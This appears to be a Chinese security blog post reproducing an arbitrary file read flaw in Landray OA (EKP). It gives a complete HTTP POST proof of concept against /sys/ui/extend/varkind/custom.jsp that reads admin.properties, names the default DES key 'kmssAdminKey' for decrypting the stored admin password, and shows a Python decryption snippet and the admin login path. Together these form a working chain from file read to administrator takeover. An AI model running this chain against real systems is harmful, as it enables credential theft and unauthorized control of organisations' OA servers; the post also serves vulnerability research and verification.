美文网首页
X凌OA系统任意文件读取-DES解密

X凌OA系统任意文件读取-DES解密

作者: thelostworldSec | 来源:发表于2021-05-13 20:21 被阅读0次

X凌OA系统任意文件读取-DES解密

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息

二、漏洞影响

蓝凌OA

三、

利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件

读取路径:

/WEB-INF/KmssConfig/admin.properties

读取文件:

POC:

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取密码DES解密登陆后台:默认密钥为 kmssAdminKey

访问后台登台:

http://127.0.0.1/admin.do

成功登陆后台:

编写POC脚本验证:

还需要自己去验证解密:

编写本地DES解密:

def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str

发现key字符过长:

ValueError: Invalid DES key size. Key must be exactly 8 bytes long.

密钥长了,查了一下下 需要前面8位就OK 也能解开

直接解密明文:

参考:

https://github.com/Cr4y0nXX/LandrayReadAnyFile

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

相关文章

网友评论

      本文标题:X凌OA系统任意文件读取-DES解密

      本文链接:https://www.haomeiwen.com/subject/fmbxjltx.html